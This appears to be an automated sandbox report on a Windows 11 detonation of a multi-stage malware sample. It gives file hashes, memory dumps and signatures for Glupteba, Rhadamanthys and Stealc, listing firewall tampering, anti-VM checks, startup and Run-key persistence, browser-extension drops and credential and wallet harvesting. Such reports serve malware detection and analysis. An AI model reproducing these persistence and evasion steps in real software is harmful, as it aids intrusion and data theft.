memory/2980-415-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS925D.tmp\Install.exe

MD5 19024664b4bd6c49e4d898317b4a2a33
SHA1 f6d8c538ab5444df258ffd2d958bd4db65997bd9
SHA256 11b47b3d9cf14562aabfaa2e4e9e67ebbb00fb3e31f9f44f148d03cd3fc3da37
SHA512 2d0f64c5ca2e1ea9af44e5c7b836efe7d02feb29915f148ce2e69ab70435a57dbe15f26a2e096d414f1cdad87066c8486397cf3de982afbe1aea74bc4def0475

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r4elbyuy.asy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe

MD5 b119ea556def66eaa9f751a650b45af0
SHA1 daf3fa0325b110183d0a233b4b0d1875f0b49ca8
SHA256 53c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4
SHA512 08dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4

memory/4912-466-0x0000000010000000-0x00000000105E5000-memory.dmp

memory/856-479-0x0000000000400000-0x0000000000AEA000-memory.dmp

memory/1352-491-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/4232-502-0x0000000000400000-0x0000000000930000-memory.dmp

memory/440-504-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/4640-515-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2980-517-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1d7f3d1036cc09d2b9c5d8d5acfbb867
SHA1 5a76ade3e2ced7d72b6ce450b074d3c5aaa13b85
SHA256 0725190ee120338da973024f3d633bd17d0009af194000fa0a91dde961a8d76c
SHA512 dc993da2058b91cd4870b0e868963cadd68d0c03aee091691d7ed0a027215ef5114c9d56ec8d9e228cd7d022339d277903fc12481e2e00df758a3915a17d1fd8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 86526e07bf8a7bf6bfbd055d4ef90965
SHA1 7f0f00e327905b09a38771f3aaa445fb79c999d2
SHA256 66344994362215c8fd590e6a64db279aceb65dab68303b9d664087966d33b92b
SHA512 76ce10a825c2bdfb1cd3618c81c4311d5a45af970934d2d2d085b61fb3dccefca39e7db2418cc077ffc0c2152d98041287289d83cf12243d1f85fb49531ff0cd

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\opera_package

MD5 856c0e24f5ee9715ee77bd4fef0995ae
SHA1 02b109c418bfdee0fc725faa35f8c45ae0725929
SHA256 74e4528ae1db501f4f5f714aead1a052b8d20cf30167ca6218f5718601e85ff1
SHA512 242d571acb0b2c35a7272a3e739ab707242cbe17109dc14bc86de38a238238539f867842ea242ba4122f657e033abe4210c107582bbf49ab47f0e9c267e6f6ff

memory/4640-585-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b3277d222d933b2d9999772f3be64c86
SHA1 1122893d91bbfe786382afbd8e24efe4cd49b71f
SHA256 0b36857c72ffd39300006901e9bad42720add740cdd4dfd890baf868ce775c2b
SHA512 d20f3c6ed3cc7f1a90acf35fa8410ff9e2f2d8ef4c005812012e94f15b287165f2fd8830b932cfc9150fa28652004c2bbc83d45f67132a3b22210701e5353aaa

memory/1352-605-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/3536-615-0x0000000010000000-0x00000000105E5000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/4232-675-0x0000000000400000-0x0000000000930000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b7730734a19453b63c20f753914ec7e0
SHA1 6fb18889f2a3f9ae06447abfc8fdf9ad6e119661
SHA256 ee77e6e66a80a6657be8c355021ea18520da80a54ac61915c681fef7163c6b74
SHA512 c53972c47b738821be5c59dc282eb7ac61db18294ccad806fd592f8c51d3732dcc1137699a638767546d3ecc496761cef34a1c471631203c93f4e4cefad25bd8

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 29e28e9da37e4900bc6113254ee685c3
SHA1 9ff27a74c5e5c77a4d6b12d3582a04b2a527bfef
SHA256 b747fa492595344414e5f008b1092086c3a1a6e92cb03886be17eddbedb267cd
SHA512 c618bf7587fe0d90d4b27348de1c6ed4e6fe9a5118509c1970201fcc425544589b8372eef45fe5468c693a25168522264d88672bc15d63346d91fde5b97d12ce

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\additional_file0.tmp

MD5 20d293b9bf23403179ca48086ba88867
SHA1 dedf311108f607a387d486d812514a2defbd1b9e
SHA256 fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348
SHA512 5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\dbgcore.DLL

MD5 8b6f64e5d3a608b434079e50a1277913
SHA1 03f431fabf1c99a48b449099455c1575893d9f32
SHA256 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2
SHA512 c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\dbghelp.dll

MD5 925ea07f594d3fce3f73ede370d92ef7
SHA1 f67ea921368c288a9d3728158c3f80213d89d7c2
SHA256 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9
SHA512 a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe

MD5 b3f05009b53af6435e86cfd939717e82
SHA1 770877e7c5f03e8d684984fe430bdfcc2cf41b26
SHA256 3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7
SHA512 d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27

memory/2980-842-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/6048-893-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/6092-894-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/6140-896-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/856-921-0x0000000000400000-0x0000000000AEA000-memory.dmp

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 9617ff9799fe2a5905f4f2bb40301428
SHA1 fe8e85956516141380711524c31158b10c74d98a
SHA256 40ebeab3c0fe603a36fed5f862bc68b9db0b0658e601e7442f50e9a9b375f000
SHA512 69a3e6e0e3308ab6ea07fb26f88223d9f746f652fe86cc63454c0e65c465bc936b0f39a7a2bf279737beae8502127dcb146df2d0b9e17380ec3ed9f273665804

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xh4b7nwe.default-release\prefs.js

MD5 e08514b62d586e3f54f9951b8a91fc4d
SHA1 22ededc0b5b4ca5bbe5ca381df05333aeab00c48
SHA256 abded86c72a94406d1696920b852e68b594086ea3efcf3ce2fd40d09cdd895a6
SHA512 415089cc8ad411a908d00b193c17d6786575a62345de0b14b00e662ee651198874fa55b7332e351aae37522b4494bf799e65893055ca9a598dd89207255f2c30

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 1426cf5b31a2b1beee6e611411cfc459
SHA1 0f7a65812c00ae6b9b9ebb7e8ec192eb96f72a58
SHA256 b812aed4b1e3e7730b3850f36fc689d3372dd1c1477a3cc3e7e166b956b25c4f
SHA512 6f63e92705825eae65b2d97d3a7065c37fd3c73064319e403c6b7d2470d2a2d3aa3f3f1bc682120b8eef76b5e3638c4edac0e3f58ac9f1258af9e3f1ad3ee95a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 014de499a6e8a79751040cebb2248add
SHA1 e9cb08c31fff55bfada1bf01b1f5630d43b78587
SHA256 0c71582a4de3581f7d143d27737c4233bb1fc444d93359309d5101a655b3b51f
SHA512 4e4f2605be24d48fe5da70f7cb79085f058e75c055dd727ad1cec3ecbb9d61d95923a3341cfa6f6cf3872f47966becc047bd927ead076eac4268eb7f2d723a81

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 eeab3117b09381cf034cd6b49df62d62
SHA1 f2240e62148ba03f5328cb3c2f256f41bc6566c6
SHA256 ab394c24fb6ef88f2969c369db39f56b7c56bec1e012412407004542a1551863
SHA512 e12af7bd85bf29390396e6087f98dc570d6003e00a8ff28d2cf151427e5d38c97e94825fe079954b52081ca7183805e7552066386bb7177d05a3a98a4c53c498

C:\Users\Admin\AppData\Local\Temp\7zSBEFA.tmp\__data__\config.txt

MD5 390ac3f2b52e0f0d283f9aaf5f6b1661
SHA1 8237596cbd07487c309fb51f424d7b08be11a2b0
SHA256 8083b98be75e90531952fc20da8e437f8b5523a3735fb96cfd1eed4e894e39cb
SHA512 8101f5d56a9b74732715c18146d88338c208ff1cb16498f6f95ba295784e7049f6558af4088f9d4ad99ab9d090cd612b56a837243474396dd0943ea7ed52a632

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-28 14:21

Reported

2024-03-28 14:23

Platform

win11-20240221-en

Max time kernel

149s

Max time network

149s

Command Line

sihost.exe

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A

Rhadamanthys

stealer rhadamanthys

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3208 created 2828 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\system32\sihost.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QzEYoAWx4smjRu1kZKqmayrp.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lmh2KmV2PnvgDuj8Qe9u335v.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t05whX2SIYE8oQqG8v96EfkB.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\78orv5C8hDfSdiFoTzVFxemj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ea41sbCuHfyirBCvzFZ4JQZW.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3Kzs6FglmbP4kUg9GHssTg5I.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eJ3wYiLxvfbSPc6hk9fHkViy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AzmgzDQiucq87nB3zKcki3TK.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\05xsiZf5NWRDpjyI705Ae2F6.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11HR7BA0lP5cYmruMGs6N6F7.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jqBiZZSu8iVMb3snbvzQSdzy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe N/A
N/A N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
N/A N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
N/A N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
N/A N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
N/A N/A C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS83D6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\vsQOe04HkxmuVDu5Ca6A8mW2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS9A5B.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
